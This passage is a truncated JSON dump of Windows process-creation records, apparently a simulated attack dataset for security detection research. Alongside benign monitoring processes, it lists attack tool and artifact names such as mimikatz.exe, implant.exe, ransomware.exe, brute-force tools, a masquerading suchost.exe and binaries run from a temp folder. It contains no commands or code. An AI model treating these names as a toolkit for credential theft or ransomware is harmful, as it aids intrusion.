0x1608\",\"PID: 0x161c\",\"PID: 0x163c\",\"PID: 0x1650\",\"PID: 0x1670\",\"PID: 0x1684\",\"PID: 0x16a4\",\"PID: 0x16b8\",\"PID: 0x16d8\",\"PID: 0x16ec\",\"PID: 0x170c\",\"PID: 0x1724\",\"PID: 0x1744\",\"PID: 0x1758\",\"PID: 0x1778\",\"PID: 0x178c\",\"PID: 0x17ac\",\"PID: 0x17bc\",\"PID: 0x17dc\",\"PID: 0x17e4\",\"PID: 0x1440\",\"PID: 0x1434\",\"PID: 0x1424\",\"PID: 0x123c\",\"PID: 0x240\",\"PID: 0x1490\",\"PID: 0x1464\",\"PID: 0x142c\",\"PID: 0x14b0\",\"PID: 0x14c0\",\"PID: 0x14fc\",\"PID: 0x14f0\",\"PID: 0x14e8\",\"PID: 0x152c\",\"PID: 0x1520\",\"PID: 0x1514\",\"PID: 0x1550\",\"PID: 0x1560\",\"PID: 0x1584\",\"PID: 0x1580\",\"PID: 0x15c0\",\"PID: 0x1600\",\"PID: 0x15f0\",\"PID: 0x162c\",\"PID: 0x166c\",\"PID: 0x1660\",\"PID: 0x1658\",\"PID: 0x169c\",\"PID: 0x168c\",\"PID: 0x16c8\",\"PID: 0x16fc\",\"PID: 0x1700\",\"PID: 0x1728\",\"PID: 0x1738\",\"PID: 0x175c\",\"PID: 0x176c\",\"PID: 0x17a8\",\"PID: 0x17a0\",\"PID: 0x17cc\",\"PID: 0x17e8\",\"PID: 0x143c\",\"PID: 0x1064\",\"PID: 0x1434\",\"PID: 0xbb4\",\"PID: 0x1404\",\"PID: 0x148c\",\"PID: 0x1464\",\"PID: 0x14b8\",\"PID: 0x14ec\",\"PID: 0x14f0\",\"PID: 0x14e8\",\"PID: 0x1564\",\"PID: 0x155c\",\"PID: 0x1550\",\"PID: 0x1560\",\"PID: 0x158c\",\"PID: 0x15d0\",\"PID: 0x15c8\",\"PID: 0x15ec\",\"PID: 0x15e8\",\"PID: 0x1630\",\"PID: 0x1668\",\"PID: 0x1658\",\"PID: 0x1664\",\"PID: 0x16d4\",\"PID: 0x16c0\",\"PID: 0x1704\",\"PID: 0x16fc\",\"PID: 0x16f4\",\"PID: 0x1770\",\"PID: 0x1774\",\"PID: 0x1728\",\"PID: 0x1798\",\"PID: 0x1758\",\"PID: 0x17a8\",\"PID: 0x17f8\",\"PID: 0x17cc\",\"PID: 0x1414\",\"PID: 0x28c\",\"PID: 0xc18\",\"PID: 0x1404\",\"PID: 0x147c\",\"PID: 0x1464\",\"PID: 0x14b8\",\"PID: 0x14ec\",\"PID: 0x14f0\",\"PID: 0x14e8\",\"PID: 0x1564\",\"PID: 0x155c\",\"PID: 0x15b8\",\"PID: 0x15d0\",\"PID: 0x158c\",\"PID: 0x1638\",\"PID: 0x1624\",\"PID: 0x1628\",\"PID: 0x1654\",\"PID: 0x169c\",\"PID: 0x10f4\",\"PID: 0x10cc\",\"PID: 0x1694\",\"PID: 0xab8\",\"PID: 0xd80\",\"PID: 0x230\",\"PID: 0x90c\",\"PID: 0xbdc\",\"PID: 0x17c0\",\"PID: 0xbdc\",\"PID: 0xa40\",\"PID: 0x690\",\"PID: 0x6d4\",\"PID: 0x1388\",\"PID: 0x11c8\",\"PID: 0x77c\",\"PID: 0x132c\",\"PID: 0x4e8\",\"PID: 0x97c\"],\"__proc_name$$\":[\"MonitoringHost.exe\",\"cscript.exe\",\"ASMHost.exe\",\"conhost.exe\",\"cscript.exe\",\"cscript.exe\",\"cscript.exe\",\"ASMHost.exe\",\"conhost.exe\",\"cscript.exe\",\"cscript.exe\",\"ASMHost.exe\",\"conhost.exe\",\"ASMHost.exe\",\"conhost.exe\",\"cscript.exe\",\"cscript.exe\",\"ASMHost.exe\",\"conhost.exe\",\"cscript.exe\",\"cscript.exe\",\"ASMHost.exe\",\"conhost.exe\",\"cscript.exe\",\"cscript.exe\",\"ASMHost.exe\",\"conhost.exe\",\"cscript.exe\",\"cscript.exe\",\"ASMHost.exe\",\"conhost.exe\",\"cscript.exe\",\"DscRun.exe\",\"conhost.exe\",\"cscript.exe\",\"ASMHost.exe\",\"conhost.exe\",\"cscript.exe\",\"cscript.exe\",\"cscript.exe\",\"ASMHost.exe\",\"conhost.exe\",\"cscript.exe\",\"cscript.exe\",\"ASMHost.exe\",\"conhost.exe\",\"cscript.exe\",\"cscript.exe\",\"cscript.exe\",\"ASMHost.exe\",\"conhost.exe\",\"cscript.exe\",\"cscript.exe\",\"ASMHost.exe\",\"conhost.exe\",\"ASMHost.exe\",\"conhost.exe\",\"cscript.exe\",\"cscript.exe\",\"ASMHost.exe\",\"conhost.exe\",\"cscript.exe\",\"cscript.exe\",\"cscript.exe\",\"ASMHost.exe\",\"conhost.exe\",\"cscript.exe\",\"cscript.exe\",\"ASMHost.exe\",\"conhost.exe\",\"cscript.exe\",\"cscript.exe\",\"ASMHost.exe\",\"conhost.exe\",\"cscript.exe\",\"ASMHost.exe\",\"conhost.exe\",\"cscript.exe\",\"cscript.exe\",\"ASMHost.exe\",\"conhost.exe\",\"cscript.exe\",\"cscript.exe\",\"ASMHost.exe\",\"conhost.exe\",\"cscript.exe\",\"cscript.exe\",\"ASMHost.exe\",\"conhost.exe\",\"cscript.exe\",\"cscript.exe\",\"ASMHost.exe\",\"conhost.exe\",\"cscript.exe\",\"cscript.exe\",\"cscript.exe\",\"ASMHost.exe\",\"conhost.exe\",\"cscript.exe\",\"cscript.exe\",\"cscript.exe\",\"ASMHost.exe\",\"conhost.exe\",\"cscript.exe\",\"cscript.exe\",\"cscript.exe\",\"ASMHost.exe\",\"conhost.exe\",\"cscript.exe\",\"cscript.exe\",\"ASMHost.exe\",\"conhost.exe\",\"ASMHost.exe\",\"conhost.exe\",\"cscript.exe\",\"cscript.exe\",\"ASMHost.exe\",\"conhost.exe\",\"cscript.exe\",\"cscript.exe\",\"ASMHost.exe\",\"conhost.exe\",\"cscript.exe\",\"cscript.exe\",\"ASMHost.exe\",\"conhost.exe\",\"cscript.exe\",\"cscript.exe\",\"ASMHost.exe\",\"conhost.exe\",\"cscript.exe\",\"pmfexe.exe\",\"cscript.exe\",\"ASMHost.exe\",\"conhost.exe\",\"cscript.exe\",\"cscript.exe\",\"cscript.exe\",\"ASMHost.exe\",\"conhost.exe\",\"cscript.exe\",\"cscript.exe\",\"ASMHost.exe\",\"conhost.exe\",\"svchost.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"dllhost.exe\",\"WmiPrvSE.exe\",\"TiWorker.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"svchost.exe\",\"MusNotification.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"net.exe\",\"net1.exe\",\"net.exe\",\"net1.exe\",\"net.exe\",\"net.exe\",\"net.exe\",\"net1.exe\",\"net.exe\",\"net1.exe\",\"regsvr32.exe\",\"win32calc.exe\",\"suchost.exe\",\"win32calc.exe\",\"cmd.exe\",\"win32calc.exe\",\"cmd.exe\",\"win32calc.exe\",\"certutil.exe\",\"win32calc.exe\",\"implant.exe\",\"win32calc.exe\",\"implant.exe\",\"win32calc.exe\",\"implant.exe\",\"win32calc.exe\",\"cmd.exe\",\"win32calc.exe\",\"powershell.exe\",\"win32calc.exe\",\"powershell.exe\",\"win32calc.exe\",\"powershell.exe\",\"win32calc.exe\",\"powershell.exe\",\"win32calc.exe\",\"powershell.exe\",\"win32calc.exe\",\"powershell.exe\",\"win32calc.exe\",\"powershell.exe\",\"win32calc.exe\",\"cmd.exe\",\"win32calc.exe\",\"cmd.exe\",\"win32calc.exe\",\"powershell.exe\",\"win32calc.exe\",\"cmd.exe\",\"win32calc.exe\",\"cmd.exe\",\"win32calc.exe\",\"cmd.exe\",\"win32calc.exe\",\"reg.exe\",\"win32calc.exe\",\"csrss.exe\",\"win32calc.exe\",\"win32calc.exe\",\"WerFault.exe\",\"conhost.exe\",\"mimikatz.exe\",\"rundll32.exe\",\"conhost.exe\",\"regsvr32.exe\",\"tasklist.exe\",\"net.exe\",\"net1.exe\",\"whoami.exe\",\"HOSTNAME.EXE\",\"NETSTAT.EXE\",\"net.exe\",\"net1.exe\",\"net.exe\",\"net1.exe\",\"net.exe\",\"net1.exe\",\"rundll32.exe\",\"reg.exe\",\"reg.exe\",\"ftp.exe\",\"dubrute.exe\",\"nlbrute.exe\",\"reg.exe\",\"reg.exe\",\"net.exe\",\"net.exe\",\"net1.exe\",\"cmd.exe\",\"netsh.exe\",\"reg.exe\",\"reg.exe\",\"cmd.exe\",\"rundll32.exe\",\"42424.exe\",\"rundll32.exe\",\"rundll32.exe\",\"1234.exe\",\"rundll32.exe\",\"rundll32.exe\",\"reg.exe\",\"reg.exe\",\"tsetup.1.exe\",\"rundll32.exe\",\"netsh.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"perfc.dat\",\"sdopfjiowtbkjfnbeioruj.exe\",\"doubleextension.pdf.exe\",\"vssadmin.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"svchost.exe\",\"smss.exe\",\"svchost.exe\",\"cmd.exe\",\"ASC_Alerttest_662jfi039n.exe\",\"powershell.exe\",\"netsh.exe\",\"wuauclt.exe\",\"cscript.exe\",\"net1.exe\",\"lsass.exe\",\"cscript.exe\",\"net1.exe\",\"cmd.exe\",\"cacls.exe\",\"cmd.exe\",\"2840.exe\",\"a_keygen.exe\",\"cmd.exe\",\"bittorrent.exe\",\"netsh.exe\",\"cmd.exe\",\"ransomware.exe\",\"cmd.exe\",\"pcalua.exe\",\"findstr.exe\",\"odbcconf.exe\",\"odbcconf.exe\",\"SQLDumper.exe\",\"mt.exe\",\"mt.exe\",\"hd.exe\",\"hd.exe\",\"netsh.exe\",\"certutil.exe\",\"reg.exe\",\"reg.exe\",\"sc.exe\",\"sc.exe\",\"taskhostw.exe\",\"GoogleUpdate.exe\",\"wermgr.exe\",\"GoogleUpdate.exe\",\"MusNotification.exe\",\"services.exe\",\"TrustedInstaller.exe\",\"svchost.exe\",\"svchost.exe\",\"sppsvc.exe\",\"WaAppAgent.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"svchost.exe\",\"Dism.exe\",\"conhost.exe\",\"DismHost.exe\"],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368],\"new_process_lc\":[\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\222\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\dllhost.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\winsxs\\\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.2602_none_7ee6020e2207416d\\\\tiworker.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\musnotification.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\net1.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\net1.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\net1.exe\",\"c:\\\\windows\\\\system32\\\\net.exe\",\"c:\\\\windows\\\\system32\\\\net1.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\regsvr32.exe\",\"c:\\\\windows\\\\system32\\\\win32calc.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\suchost.exe\",\"c:\\\\windows\\\\system32\\\\win32calc.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\win32calc.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\win32calc.exe\",\"c:\\\\diagnostics\\\\usertmp\\\\certutil.exe\",\"c:\\\\windows\\\\system32\\\\win32calc.exe\",\"c:\\